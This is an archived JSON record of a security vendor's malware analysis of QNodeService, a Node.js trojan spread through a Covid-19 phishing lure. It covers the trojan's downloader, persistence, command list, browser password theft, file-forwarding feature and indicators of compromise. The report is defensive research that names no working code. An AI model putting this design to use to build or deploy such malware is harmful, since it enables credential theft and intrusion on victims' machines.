{
	"id": "92c407a4-ad5e-44da-9414-93a53aef2db8",
	"created_at": "2026-04-06T00:13:45.19593Z",
	"updated_at": "2026-04-10T13:12:14.346279Z",
	"deleted_at": null,
	"sha1_hash": "0e828fc09a79b94ba670dfbed587f238e6fedb96",
	"title": "QNodeService: Node.js Trojan Spread via Covid-19 Lure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 57330,
	"plain_text": "QNodeService: Node.js Trojan Spread via Covid-19 Lure\r\nBy Matthew Stewart ( words)\r\nPublished: 2020-06-09 · Archived: 2026-04-05 21:03:25 UTC\r\nQNodeService is a new, undetected malware sample written in Node.js, which is an unusual choice for malware authors.\r\nThe malware has functionality that enables it to download/upload/execute files, steal credentials from Chrome/Firefox\r\nbrowsers, and perform file management, among other things.\r\nBy: Matthew Stewart Jun 09, 2020 Read time: 5 min (1457 words)\r\nSave to Folio\r\nWe recently noticed a Twitter post by MalwareHunterTeam that showed a Java downloader with a low detection rate. Its\r\nname, “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar”, suggests it may have been used in a Covid-19-\r\nthemed phishing campaign. Running this file led to the download of a new, undetected malware sample written in Node.js;\r\nthis trojan is dubbed as “QNodeService”.\r\nThe use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web\r\nserver development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon\r\nplatform may have helped evade detection by antivirus software.\r\nThe malware has functionality that enables it to download/upload/execute files, steal credentials from Chrome/Firefox\r\nbrowsers, and perform file management, among other things. It targets Windows systems, but its design and certain pieces of\r\ncode suggest cross-platform compatibility may be a future goal.\r\nThe infection begins with a Java downloader which, in addition to downloading Node.js, downloads the following files:\r\n“wizard.js”, and “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”. We analyzed these components to learn more about\r\ntheir behavior.\r\nAnalysis of Java Downloader\r\nThe sample mentioned above, “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar”, serving as the Java\r\ndownloader, has been obfuscated with the Allatori obfuscator. Allatori adds junk code and obfuscates strings to make\r\nanalysis more difficult. We deobfuscated the code to be able to start the analysis.\r\nDecompiled code of the sample (obfuscated with Allatori obfuscator)\r\nFigure 1. Decompiled code of the sample (obfuscated with Allatori obfuscator)\r\nDeobfuscated code of the sample\r\nFigure 2. Deobfuscated code of the sample\r\nIt downloads Node.js to the User Profile directory. It checks the system architecture and downloads the 32-bit or 64-bit\r\nversion appropriately.\r\node snippet for downloading Node.js to the user directory\r\nFigure 3. Code snippet for downloading Node.js to the user directory\r\nIt also downloads a file named “wizard.js” from the URL hxxps://central.qhub.qua.one/scripts/wizard.js. It then runs this file\r\nusing Node.js with multiple command line arguments, including the URL of the C\u0026C server:\r\nwizard.js being run by Node.js\r\nFigure 4. wizard.js being run by Node.js\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/\r\nPage 1 of 5\n\nNote that “–group user:476@qhub-subscription[…]” is a parameter used during communication with the C\u0026C server; the\r\npresence of a user identifier and mention of a “subscription” suggest that this malware may be sold as a subscription service.\r\nAnalysis of wizard.js\r\nThe wizard.js file is an obfuscated Javascript (Node.js) file. It is responsible for persistence (by creating a “Run” registry\r\nkey entry) and for downloading another payload depending on the system architecture.\r\nIt creates a file named “qnodejs-\u003c8 digit hex number\u003e.cmd” which contains the arguments used to launch the file. This is\r\ninvoked by the registry key entry it creates at “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run”. It also\r\nchecks whether it’s running on a Windows platform, suggesting the authors may have cross-platform compatibility in mind.\r\nFigure 5. wizard.js checks if it’s running on windows, and installs the Run registry key entry if so\r\nFigure 5. wizard.js checks if it’s running on windows, and installs the Run registry key entry if so\r\nFigure 6. The registry “Run” key entry added by wizard.js\r\nFigure 6. The registry “Run” key entry added by wizard.js\r\nIt downloads a file from hxxps://central.qhub.qua.one/scripts/qnodejs-\u003cplatform\u003e-\u003carch\u003e.js. Based on possible values for\r\nprocess.platform and process.arch in Node.js, we found files qnodejs-win32-ia32.js and qnodejs-win32-x64.js hosted on the\r\nserver. The server also contains SHA1 hashes for each sample, although they are named .sha256. These hashes are\r\ndownloaded and checked by the downloaded sample when it runs.\r\nUsing process.platform and process.arch to determine the payload to download\r\nFigure 7. Using process.platform and process.arch to determine the payload to download\r\nAnalysis of qnodejs-win32-\u003carchitecture\u003e.js\r\nA file named qnodejs-win32-ia32.js or qnodejs-win32-x64.js is downloaded based on the system architecture (whether the\r\nOS is 64-bit or 32-bit).\r\nThe files contain an embedded “node_modules” folder with libraries for Node.js, which is extracted upon execution. Unlike\r\nthe Javascript code itself, these libraries are architecture-specific, which is the reason separate files are distributed based on\r\nsystem architecture. Screenshots below are based on the “win32-ia32” variant from 2020-04-30.\r\nWe named this malware “QNodeService,” since this seems to be the name used internally, as indicated by the code that\r\nvalidates command line arguments.\r\n“QNodeService” used internally in the code\r\nFigure 8. The name “QNodeService” used internally in the code\r\nThe malware is divided into modules. Access to these modules is obfuscated with the use of a lookup function named “v”.\r\nSome modules consist solely of a “require” call to import libraries, while others are custom modules written by the author.\r\nModules used by the malware\r\nFigure 9. Modules used by the malware\r\nModules are referenced by index with lookup function “v”\r\nFigure 10. Modules are referenced by index with lookup function “v”\r\nCertain modules in this file are identical to wizard.js; in particular, these reuse the code that determines the URL for the\r\nsample and its hash. In this file, the module is used to download and verify the SHA1 hash. If the hash fails, the malware\r\nterminates.\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/\r\nPage 2 of 5\n\nThe malware uses the socket.io library for communication with the C\u0026C server. As a result, it is designed with a reactive\r\nprogramming paradigm, and uses WebSocket to communicate with the server.\r\nWebSocket handshake\r\nFigure 11. WebSocket handshake\r\nThe malware can steal passwords from Chrome and Firefox.\r\nCode snippets for stealing passwords from Chrome\r\nFigure 12. Code snippets for stealing passwords from Chrome\r\nCode snippets for stealing passwords from Firefox\r\nFigure 13. Code snippets for stealing passwords from Firefox\r\nBelow is a list of commands accepted by the malware:\r\nCommand Description\r\ncontrol/reload Signals wizard.js to redownload the main payload.\r\ncontrol/uninstall Signals wizard.js to remove the Run key entry from the system and terminate.\r\ninfo/get-ip-address Gets IP address, location, hostname, etc.\r\ninfo/get-label Returns label set by the “set-label” command\r\ninfo/get-machine-uuid Gets a UUID generated by the malware.\r\ninfo/get-os-name Gets the platform (windows) and architecture (x32/x64) of the system.\r\ninfo/get-user-home Gets the user profile directory (os.homedir())\r\ninfo/set-label Sets label\r\nfile-manager/absolute Gets the full path of a file\r\nfile-manager/execute Executes a file with the command ‘start “” /B \u003cfile\u003e’\r\nfile-manager/delete Removes a file or files on the system (accepts globs, using “rimraf” library)\r\nfile-manager/forward-access Generates URL and token to use for the “http-forward” command (see below)\r\nfile-manager/list Lists files in specific directories\r\nfile-manager/mkdirs Creates a directory on the system\r\nfile-manager/write Writes a file sent from the C\u0026C SERVER onto the system\r\nhttp-forward\r\nHTTP requests sent to a specific URL at the C\u0026C are routed to the infected machine\r\n(see below)\r\npassword-recovery/applications\r\nLists applications for which passwords can be read (Chrome \u0026 Firefox)\r\npassword-recovery/recover Recovers passwords from a specific application (Chrome or Firefox)\r\nOn May 5th, the malware was updated with three additional commands:\r\ninfo/get-tags Returns list of tags set by “add-tag” command\r\ninfo/add-tag Adds tags\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/\r\nPage 3 of 5\n\ninfo/remove-tag Removes tags\r\nOf particular note is the http-forward command, which allows an attacker to download a file without directly connecting to\r\nthe victim machine, as shown below in figures 13-16. However, a valid request path and access token are required to access\r\nfiles on the machine. The C\u0026C server must first send “file-manager/forward-access” to generate the URL and access token\r\nto use for the http-forward command later\r\n.\r\nC\u0026C server sends “file-manager/forward-access” command over WebSocket\r\nFigure 14. C\u0026C server sends “file-manager/forward-access” command over WebSocket\r\nThe malware responds with the access token and URL\r\nFigure 15. The malware responds with the access token and URL that are used in the cURL request in Figure\r\n16\r\nThe malware responds with the forwarding URL and access token. Then, a third party who has been given the URL and\r\naccess token could send an HTTP request to the C\u0026C server to retrieve files from the victim machine without directly\r\nconnecting to it.\r\nAn HTTP cURL request to the C\u0026C\r\nFigure 16. An HTTP cURL request to the C\u0026C server requesting “C:\\foo.txt” (with contents “bar”)\r\nThe C\u0026C server forwards the HTTP request to the malware on the victim machine using the http-forward command. If the\r\naccess token is correct, the malware sends the file’s contents back to the C\u0026C server, which in turn sends the contents back\r\nto the attacker in its HTTP response, enabling remote download.\r\nC\u0026C server forwards the cURL request to the malware on the victim machine\r\nFigure 17. C\u0026C server forwards the cURL request to the malware on the victim machine with the “http-forward” command\r\nSimilar to wizard.js, the authors seem to have cross-platform compatibility in mind. Although this sample is the win32-ia32\r\nvariant, it contains code that would improve compatibility on Darwin (MacOS) and Linux platforms.\r\nCode snippet showing cross-platform compatibility\r\nFigure 18. Code snippet showing cross-platform compatibility\r\nRecommendations\r\nThreat actors constantly come up with ingenious ways to create malware and ensure that it affects as many systems for as\r\nlong as it can, such as using environments that are less utilized for malware creation, maintaining persistence, and giving\r\nthem cross-platform compatibility. To defend against such malware, users can block them from getting through possible\r\nentry points, such as email, endpoints, and network, through the following security solutions:\r\nFor email – Trend Micro™ Email Securityproducts offers AI-based detection and sandboxing capabilities to detect\r\nand block malware and malicious URLs\r\nFor endpoints – Trend Micro Apex One provides pre-execution and runtime machine learning and automated threat\r\ndetection\r\nFor networks – Trend Micro TippingPoint Threat Protection Systemproducts inspects and blocks network traffic in\r\nrealtime to stop the infiltration of threats\r\nIndicators of Compromise\r\n \r\nFile name SHA-256 Detection Name\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/\r\nPage 4 of 5\n\nJava\r\ndownloader\r\n5210AFA4567B98FB3F8AEE513206B5FD466D3AFE01DD576A2BEE4A623F2CDAE2 Trojan.Java.QNODESERV\r\nwizard.js\r\n(2020-04-\r\n30)\r\n9FBAFF43A596921EFD7BB3B015A541A00633320C3DE66BE795BADA098D37F8FE Trojan.JS.QNODESERVIC\r\nqnodejs-win32-\r\nia32.js\r\n(2020-04-\r\n30)\r\nEB00CD731EE622EAF53BFD19A789E494872BACA156455C38CA3035B2E33CC152 Backdoor.JS.QNODESER\r\nqnodejs-win32-\r\nx64.js\r\n(2020-04-\r\n30)\r\nF3C5F8EF9886DC300BCE3E6DB0B973B3408AE82EB5789C4BA72FEC27D61CA693 Backdoor.JS.QNODESER\r\nwizard.js\r\n(2020-05-\r\n05)\r\n5CCED1119F4FDC175967594EC4671EF74E645D46F5F7ED1200513C7EA7DC31CF Trojan.JS.QNODESERVIC\r\nqnodejs-win32-\r\nia32.js\r\n(2020-05-\r\n05)\r\n76B8E43AB3E38B8635588FBD9C9A527022691962DD158A480671DDF98C7110F8 Backdoor.JS.QNODESER\r\nqnodejs-win32-\r\nx64.js\r\n(2020-05-\r\n05)\r\n16376D225C3B16E6E0D50259241939DE6AD19A82668F650AACDAF173576C5003 Backdoor.JS.QNODESER\r\nC\u0026C SERVER\r\ncentral[.]qhub[.]qua[.]one\r\nTags\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/"
	],
	"report_names": [
		"qnodeservice-node-js-trojan-spread-via-covid-19-lure"
	],
	"threat_actors": [],
	"ts_created_at": 1775434425,
	"ts_updated_at": 1775826734,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0e828fc09a79b94ba670dfbed587f238e6fedb96.pdf",
		"text": "https://archive.orkl.eu/0e828fc09a79b94ba670dfbed587f238e6fedb96.txt",
		"img": "https://archive.orkl.eu/0e828fc09a79b94ba670dfbed587f238e6fedb96.jpg"
	}
}